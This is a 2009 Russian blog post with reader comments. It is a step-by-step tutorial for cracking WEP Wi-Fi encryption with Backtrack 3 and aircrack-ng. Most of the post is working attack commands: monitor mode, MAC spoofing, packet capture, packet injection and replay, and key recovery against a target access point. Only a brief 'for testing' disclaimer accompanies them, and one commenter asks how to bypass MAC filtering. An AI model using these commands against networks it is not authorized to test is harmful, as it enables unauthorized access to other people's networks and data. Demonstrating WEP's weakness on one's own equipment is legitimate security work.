Взламываем WEP, используя Backtrack 3
Метки: Backtrack | tips | хакинг
Понедельник, 2 марта 2009 г.
Просмотров: 85353
Подписаться на комментарии по RSS
Я уже рассказывал в этом блоге про Backtrack, в данной же статье мы рассмотрим одно из важнейших его применений. То, о чем я буду рассказывать в данной статье, я уже публиковал, но в виде роликов с ютуба. В данной же статье я объясню все более подробно. Не лишним будет заметить, что данное пособие предназначено для тестовых целей, и не ставит своей целью взращивание хацкеров. В данной статье будет объяснено каким образом можно взломать 64bit и 128bit WEP шифрование на различных WIFI роутерах используя Backtrack, live-дистрибутив Linux. Я выполнял описанные действия на ноутбуках IBM Thinkpad x60, Acer 5672 и WIFI чипсет в этих машинах работал отлично.
Требования:
- Backtrack 3 на CD или USB
- Компьютер с поддерживаемой беспроводной картой 802.11
- Wireless Access point или WIFI роутер, использующий WEP шифрование
Подготавливаем WIFI карту
Для начала мы должны перевести карту в режим “Monitor Mode”. Если вы используете чипчет Intel® PRO/Wireless 3945ABG выполните следующую команду:
modprobe -r iwl3945
modprobe ipwraw
Далее мы должны остановить нашу WIFI карту:
iwconfig
Посмотри под каким именем виден ваш беспроводной интерфейс, далее остановите его командой:
airmon-ng stop [device]
Затем:
ifconfig down [interface]
Изменяем MAC адрес устройства:
macchanger --mac 00:11:22:33:44:66 [device]
Запускаем карту:
airmon-ng start [device]
Начинаем атаку
Теперь пришло время найти подходящую сеть для атаки. Запускаем команду:
airodump-ng [device]
Мы видим доступные сети, в частности MAC адрес (BSSID), канал (CH) и имя (ESSID). Теперь мы начнем собирать данные с WIFI роутера для атаки:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
Команда выше поместит полученные данные в файл network.out. Этот файл потребутеся нам позднее когда мы будем готовы взламывать WEP ключ.
Откройте другое окно шелла и оставьте предыдущую команду выполняться. Теперь же мы сгенерируем несколько поддельных пакетов к роутеру для ускорения сбора данных. Используйте следующую команду:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
Если команда выше прошла успешно, мы будем генерировать большое количество пакетов на взламываемую сеть. Введите:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
Это заставит точку доступа послать большое количество пакетов, которые мы сможем использовать для взлома WEP ключа. Проверьте ваш оставленный в первом окне шелла aerodump-ng. Вы должны увидеть там поле “data”, в котором уже довольно много пакетов.
Когда значение этого поля достигает 10,000-20,000 вы можете начинать взлом ключа. Если нет других доступных сетей, можно попробовать команду:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
Когда мы наберем достаточно пакетов, начинаем взлом:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
Параметр “-n 128″ указывает на 128-битный WEP ключ. Если взлом не получится, используйте “-n 64″
Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы :
Используйте данную технику для демонстрации слабости WEP шифрования. Я надеюсь вы сами используете WPA2 в ваших сетях.
Постовой
Оригинальные гаджеты и инновационные девайсы в блоге mobilexus.ru
Существуте ли ещё вообще такое понятие как патриотизм в России? Конечно да, существуют ещё люди для которых данные слова не пустой звук. Приходите на наш сайт, и убедитесь в этом.
Еще записи по теме
- Backtrack 2: Утилита dig
- Настройка почтового шлюза на базе Postfix
- Как сконфигурировать программный RAID на отправку почты в случае неисправностей
- Как решить конфликт портов Tomcat - Openfire
- Получение списка всех записей публичного домена командой Nslookup
- DRAC - удаленное развертывание ОС
- Взламываем WPA2 PSK используя Backtrack 4, aircrack-ng и John The Ripper
Комментариев: 16
zdrastvuite. u menya problema s back track 3. kogda ya otkrivayu back track 3 i na4inayu vvodit komandu moi komputer imeet zavis i viklu4aetsya avtomati4eskiy. Ranwe takogo ne bylo, ya ne ponemayu v 4em problema. esli vy znaite v 4em problema, pojaluista daite mne znat. sposibo. moi e-mail: art_yom@mail.ru
как прописать путь для сохранения файла network.out или как посмотреть куда он сохраняется. Я загружаю back track 3 c CD
Не обязательно Back track использовать можно любой из Linux`ов установив нужные пакеты. А network.out сохраняется в ту папку в какой вы находитесь на момент выполнения команды переход в другую папку cd
Спс, а как обойти фильтрацию по мак-адресам?
Не подскажите какие пакеты нужно поставить в Mandiva Linux, а то не находит airplay-ng.
2Savr aireplay-ng
Странно у меня когда отпровляються пакеты очень медлоенный рейт 13 пакетов в 10 секунд. пробывал менять рейт от 1ого мб до 54 не помогает уже не знаю как решить эту проблему -х в аирплай-нг не помогует
123
Вы должны увидеть там поле “data”, в котором уже довольно много пакетов. ---- Мало пакетов или нет вообще что делать?
С линуксом не сталкивался никогда, так что вопрос наверно глупый. Скачал backtrack, записал на диск и гружусь с него. Проблема в том что на видо видна какая-то графическая оболочка, а у меня появляется консоль. Что я не так делаю?
Разобрался
команда "startx"
pomogite pojalusta ne kak ne poimu pochemu u menya data ne lovit na 0 a beacons lovit dofiga
Дело в биосе, у тебя back track 3 поставил другую виде карту, просто нужно при загрузке войти в биос BOOT последняя строка жмеш ентер и смени на другую и се заработает..
Все это замечательно, спасибо автору, но... Вот он пишет: "Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы ". Но, как я понимаю, программа выдала ключ в 16ти ричном коде. А вот как его перевести, если по таблице получается, (я пробовал на примере своего роутера), многие символы в псевдографике =). Так какой же таблицей пользоваться для трансляции в нормальный вид кода? ;)
alilua
набрал 32 тысячи пакетов ключ не найден пишит наберите 35 тыщ и так постоянно!в чем может быть проблема!?